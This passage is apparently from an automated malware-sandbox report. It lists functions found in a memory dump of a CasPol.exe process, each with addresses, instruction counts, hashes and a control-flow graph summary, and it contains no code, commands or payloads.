                                                                                                                                                                                                                                                    • Opcode ID: 4d97d92b4880263501c6e1d7df9cd85af37fa1ce55048df8e48f908dd665f1cf
                                                                                                                                                                                                                                                    • Instruction ID: c2978f9d82787f3238136fe1f22573f6d8b0aa9a4c0b7e1c9d253cee765b1ad5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d97d92b4880263501c6e1d7df9cd85af37fa1ce55048df8e48f908dd665f1cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC114971B10224DFDB54AB78C805B6E7BF1AF48750F108469EA0AEB390DA799D01CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628CF38 Relevance: .8, Instructions: 797COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2349 628cf38-628cf53 2350 628cf55-628cf58 2349->2350 2351 628cf5a-628cf69 2350->2351 2352 628cfa1-628cfa4 2350->2352 2353 628cf78-628cf84 2351->2353 2354 628cf6b-628cf70 2351->2354 2355 628cfed-628cff0 2352->2355 2356 628cfa6-628cfe8 2352->2356 2357 628cf8a-628cf9c 2353->2357 2358 628d955-628d98e 2353->2358 2354->2353 2359 628d039-628d03c 2355->2359 2360 628cff2-628d034 2355->2360 2356->2355 2357->2352 2369 628d990-628d993 2358->2369 2361 628d03e-628d080 2359->2361 2362 628d085-628d088 2359->2362 2360->2359 2361->2362 2364 628d08a-628d0a6 2362->2364 2365 628d0ab-628d0ae 2362->2365 2364->2365 2371 628d0b0-628d0f2 2365->2371 2372 628d0f7-628d0fa 2365->2372 2374 628d995-628d9c1 2369->2374 2375 628d9c6-628d9c9 2369->2375 2371->2372 2377 628d0fc-628d13e 2372->2377 2378 628d143-628d146 2372->2378 2374->2375 2381 628d9d8-628d9db 2375->2381 2382 628d9cb 2375->2382 2377->2378 2385 628d148-628d157 2378->2385 2386 628d18f-628d192 2378->2386 2391 628d9dd-628d9f9 2381->2391 2392 628d9fe-628da00 2381->2392 2609 628d9cb call 628daad 2382->2609 2610 628d9cb call 628dac0 2382->2610 2394 628d159-628d15e 2385->2394 2395 628d166-628d172 2385->2395 2389 628d1a1-628d1a4 2386->2389 2390 628d194-628d196 2386->2390 2402 628d1b3-628d1b6 2389->2402 2403 628d1a6-628d1a8 2389->2403 2400 628d19c 2390->2400 2401 628d421 2390->2401 2391->2392 2405 628da02 2392->2405 2406 628da07-628da0a 2392->2406 2394->2395 2395->2358 2397 628d178-628d18a 2395->2397 2397->2386 2399 628d9d1-628d9d3 2399->2381 2400->2389 2409 628d424-628d430 2401->2409 2413 628d1b8-628d1fa 2402->2413 2414 628d1ff-628d202 2402->2414 2411 628d1ae 2403->2411 2412 628d2df-628d2e8 2403->2412 2405->2406 2406->2369 2415 628da0c-628da1b 2406->2415 2409->2385 2422 628d436-628d723 2409->2422 2411->2402 2418 628d2ea-628d2ef 2412->2418 2419 628d2f7-628d303 2412->2419 2413->2414 2414->2409 2416 628d208-628d20b 2414->2416 2433 628da1d-628da80 call 6286598 2415->2433 2434 628da82-628da97 2415->2434 2427 628d20d-628d24f 2416->2427 2428 628d254-628d257 2416->2428 2418->2419 2429 628d309-628d31d 2419->2429 2430 628d414-628d419 2419->2430 2562 628d729-628d72f 2422->2562 2563 628d94a-628d954 2422->2563 2427->2428 2436 628d259-628d29b 2428->2436 2437 628d2a0-628d2a3 2428->2437 2429->2401 2452 628d323-628d335 2429->2452 2430->2401 2433->2434 2461 628da98 2434->2461 2436->2437 2441 628d2ad-628d2b0 2437->2441 2442 628d2a5-628d2aa 2437->2442 2449 628d2cd-628d2cf 2441->2449 2450 628d2b2-628d2c8 2441->2450 2442->2441 2457 628d2d1 2449->2457 2458 628d2d6-628d2d9 2449->2458 2450->2449 2469 628d359-628d35b 2452->2469 2470 628d337-628d33d 2452->2470 2457->2458 2458->2350 2458->2412 2461->2461 2473 628d365-628d371 2469->2473 2474 628d33f 2470->2474 2475 628d341-628d34d 2470->2475 2488 628d37f 2473->2488 2489 628d373-628d37d 2473->2489 2480 628d34f-628d357 2474->2480 2475->2480 2480->2473 2492 628d384-628d386 2488->2492 2489->2492 2492->2401 2494 628d38c-628d3a8 call 6286598 2492->2494 2502 628d3aa-628d3af 2494->2502 2503 628d3b7-628d3c3 2494->2503 2502->2503 2503->2430 2506 628d3c5-628d412 2503->2506 2506->2401 2564 628d73e-628d747 2562->2564 2565 628d731-628d736 2562->2565 2564->2358 2566 628d74d-628d760 2564->2566 2565->2564 2568 628d93a-628d944 2566->2568 2569 628d766-628d76c 2566->2569 2568->2562 2568->2563 2570 628d77b-628d784 2569->2570 2571 628d76e-628d773 2569->2571 2570->2358 2572 628d78a-628d7ab 2570->2572 2571->2570 2575 628d7ba-628d7c3 2572->2575 2576 628d7ad-628d7b2 2572->2576 2575->2358 2577 628d7c9-628d7e6 2575->2577 2576->2575 2577->2568 2580 628d7ec-628d7f2 2577->2580 2580->2358 2581 628d7f8-628d811 2580->2581 2583 628d92d-628d934 2581->2583 2584 628d817-628d83e 2581->2584 2583->2568 2583->2580 2584->2358 2587 628d844-628d84e 2584->2587 2587->2358 2588 628d854-628d86b 2587->2588 2590 628d87a-628d895 2588->2590 2591 628d86d-628d878 2588->2591 2590->2583 2596 628d89b-628d8b4 call 6286598 2590->2596 2591->2590 2600 628d8c3-628d8cc 2596->2600 2601 628d8b6-628d8bb 2596->2601 2600->2358 2602 628d8d2-628d926 2600->2602 2601->2600 2602->2583 2609->2399 2610->2399
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d2de99b7568d71d56eb89b84ab61dc5644f75d57f4385788fd721dd87200b4b9
                                                                                                                                                                                                                                                    • Instruction ID: 7ef0481a0e5885c38c6d8e01c9d0bc884443af5521541733172a4d48d6c3f04c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2de99b7568d71d56eb89b84ab61dc5644f75d57f4385788fd721dd87200b4b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA626030A102099FDB54EB68D8A0A5EB7F2FF85700B60C969D4069F399DB71EC46CBD1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628ACC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a1f696e4c909e8a6db3787c5e298f139650038250b85825fc80af2aaf2e50eb1
                                                                                                                                                                                                                                                    • Instruction ID: 86c1581f6d6d6f3932cac8ef70544990f062957d5c1acedc5c6036f0770ef031
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1f696e4c909e8a6db3787c5e298f139650038250b85825fc80af2aaf2e50eb1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E18330E212098FDB65EB68D89066EB7B2FF85300F54852AD805EB385DF75AC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628B218 Relevance: .3, Instructions: 291COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2f1333310c4ee8de5d35e53f071c2c030dcdf99aeac682ab5bbb4081311af3d0
                                                                                                                                                                                                                                                    • Instruction ID: 3c3ac45983e7af8c70e056ddecf86a1c057e9b516341ab969a5746a44ed0701d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f1333310c4ee8de5d35e53f071c2c030dcdf99aeac682ab5bbb4081311af3d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A1B674F2110A8FEF64EB68C8917AEB7A2FB85311F648429E805E77D5CA34DC81CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06284288 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 41aa5ae1f8c56aba9230b9d5c943eeb9f0bd39ac85f2931663b604a88e78a2a4
                                                                                                                                                                                                                                                    • Instruction ID: 8d7e97d490f3eb77bb7f1b362af761c24d137f4372a56f2677c8c91045af26bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41aa5ae1f8c56aba9230b9d5c943eeb9f0bd39ac85f2931663b604a88e78a2a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F919070B152458FDB54EBA8C8606AEBBF2BF89300F108469D805DB395EE74DC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06289148 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1d3ecfec7d545d69be50983a85f311a09c63c035521d787cc5ac39c4476a403a
                                                                                                                                                                                                                                                    • Instruction ID: d49a9ddc040ab031062671a0ca42a56692228d3399dda0afdc26e04d962bfc1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3ecfec7d545d69be50983a85f311a09c63c035521d787cc5ac39c4476a403a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4915371F502099FDB64EB68D8507AE77F6BF88340F108565D809E7384EE70AD86CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062861E8 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9b2aa50c9a3d5688c066bdfa1b0b1ced5622d1aad2fb40ceaf614e388cb221ff
                                                                                                                                                                                                                                                    • Instruction ID: f3652fd6f272fde745445dbb7963e10019db3b6e47f3f69ec9ce3271afc96f5f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b2aa50c9a3d5688c066bdfa1b0b1ced5622d1aad2fb40ceaf614e388cb221ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B61C471F101114FDF51AA6ECC8066EBAD7AFC4620B254479D80ADB365DEB9EC02C7D1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062842B8 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d658a0e7cfc2bccdf74f0b7351237eb257c11dd683ca6b52dd6136b06e5899fa
                                                                                                                                                                                                                                                    • Instruction ID: 221929c725de90dbc46c6fec2887c6899a5a0b3d424c7fc4c42603ae678b5bbb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d658a0e7cfc2bccdf74f0b7351237eb257c11dd683ca6b52dd6136b06e5899fa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF813F70B1120A9FDB54EBA9D45466EBBE2FB89300F208529E809DB385DE34EC46CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062845C4 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bcc848c954ac3b68cb56749e5794d8fa465500a985ab0b91d36e3e558cbea80e
                                                                                                                                                                                                                                                    • Instruction ID: 653ffebbf02d78054159d620a2eeb3e323e8990adc73af001afef95b3f9a8cad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcc848c954ac3b68cb56749e5794d8fa465500a985ab0b91d36e3e558cbea80e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA912E74E1061A8FDF60DF68C880B9DB7B1FF89310F208599D549BB285DB70AA85CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 062845D8 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a0aeec839322b0b2ce9065f5aefb5881aa00675753f95ed38c2bf6770dec5cd1
                                                                                                                                                                                                                                                    • Instruction ID: b924e2fe55eebff839f4cf149fbd6c0507423b286eefb2886e22381ea836c744
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0aeec839322b0b2ce9065f5aefb5881aa00675753f95ed38c2bf6770dec5cd1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1911D74E1061A8FDF60DF68C880B9DB7B1FF89310F208599D549BB285DB70AA85CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628EB01 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 357c17e1f67022b57dd5d2785c661243104d4da9bc6bddaa9126515b65a5af6e
                                                                                                                                                                                                                                                    • Instruction ID: e3b3da429c77f560f3e46359d3506fbf38c0640cef809d7a0741391152475723
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 357c17e1f67022b57dd5d2785c661243104d4da9bc6bddaa9126515b65a5af6e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F715D70E112099FDB54EFA9D980AADBBF6FF84300F158429E845EB395DB30E946CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628EB10 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fcb7b6d2ffe9743244c10fa1df614f48423b5a1afa82ceee7f679b59f56fa272
                                                                                                                                                                                                                                                    • Instruction ID: 7125d12a051b9e7463c041629d52d1667f28e7cc51181bf954b525c01ffc93a3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcb7b6d2ffe9743244c10fa1df614f48423b5a1afa82ceee7f679b59f56fa272
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C715C70E112099FDB54EFA9D880AADBBF6FF84300F158429E845AB395DB30ED46CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06284B70 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c40275684cd64ce578d7b9dc09885fe150f8a9b44920d38964149a1a02bb275a
                                                                                                                                                                                                                                                    • Instruction ID: 914e1d98500964d770e64a16bd59c8d74203ac2648ea6ace19118050d3ce2f38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c40275684cd64ce578d7b9dc09885fe150f8a9b44920d38964149a1a02bb275a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C618230F102099FEB54AFA5C8557AEBBF6FB88700F20842AE505AB395DF744D45CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FC80 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 53a1eaae5b3489a46cd6f44336a8ffc0b2f056c47c072cdfe833c0478b7fcd2a
                                                                                                                                                                                                                                                    • Instruction ID: edcdfb182d51177db236ae4da9ff14958215225815e064422429ecf62d54b1b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53a1eaae5b3489a46cd6f44336a8ffc0b2f056c47c072cdfe833c0478b7fcd2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4512631E21209DFDB24FB78E9447ADBBB2FF89351F108869E506D7291DB359845CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FA20 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 36bfd5cb30cf747111c7476b59687d7a4d1edede4edca6edef1d9189e76e4985
                                                                                                                                                                                                                                                    • Instruction ID: 0ea3192f3dbbc9d1d543b5a7c2b73d2f00d3bdce5b91d4d6accfbb3cc9d6a49b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36bfd5cb30cf747111c7476b59687d7a4d1edede4edca6edef1d9189e76e4985
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951A370B302055FEF646A68DD6572F375AE78A750F60443AE80AC77D5CA78CC4287A2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628FA30 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 49cb9446a15ba59ed310dc9264d00eb8c269d80eb777eb70b2a74fa1810af35c
                                                                                                                                                                                                                                                    • Instruction ID: 0a4193976b418fa2a26ae8ccbe19d948a397c67ed4b83cf6df04616d0c85a233
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49cb9446a15ba59ed310dc9264d00eb8c269d80eb777eb70b2a74fa1810af35c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D251A270B302055FEF647A68DD6572F365AE78A750F604439E80AC37D5CA79CC8287E2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06289139 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c821c0dda52b1c36c91eac615dbe3bca808ee50326932ccde89a1be96c9e949a
                                                                                                                                                                                                                                                    • Instruction ID: 7613320c60039ad1a4043239b927825f3824f6a11f4c33d2d26e7e96e3f513a8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c821c0dda52b1c36c91eac615dbe3bca808ee50326932ccde89a1be96c9e949a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1512E71F501059FDB65EB68D8A0B6E77E6BF88340F108469D80ADB384DE71AC46CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06284B60 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: caf2d2a3d4428ab179701da0c0cbced88fbac59a957bbfd860e05df3f03ce2cd
                                                                                                                                                                                                                                                    • Instruction ID: fe85fc45bedf8a90624ad7f5e5a82f70fe7580dd6f7e6ff384e77412eff386f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caf2d2a3d4428ab179701da0c0cbced88fbac59a957bbfd860e05df3f03ce2cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB518271F102089FDB55AFA5C8557AEBBF2FF88700F24842AE505AB395DE749C068B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06285428 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 15f84f028f7ce485d6a57e2067cf33da0fbea2ab23f47fccf9cc7537cfb6d75f
                                                                                                                                                                                                                                                    • Instruction ID: 1934b0e4c417da977f26e9a98398316ed01ea849adadeb8a5b7904f70839a8c2
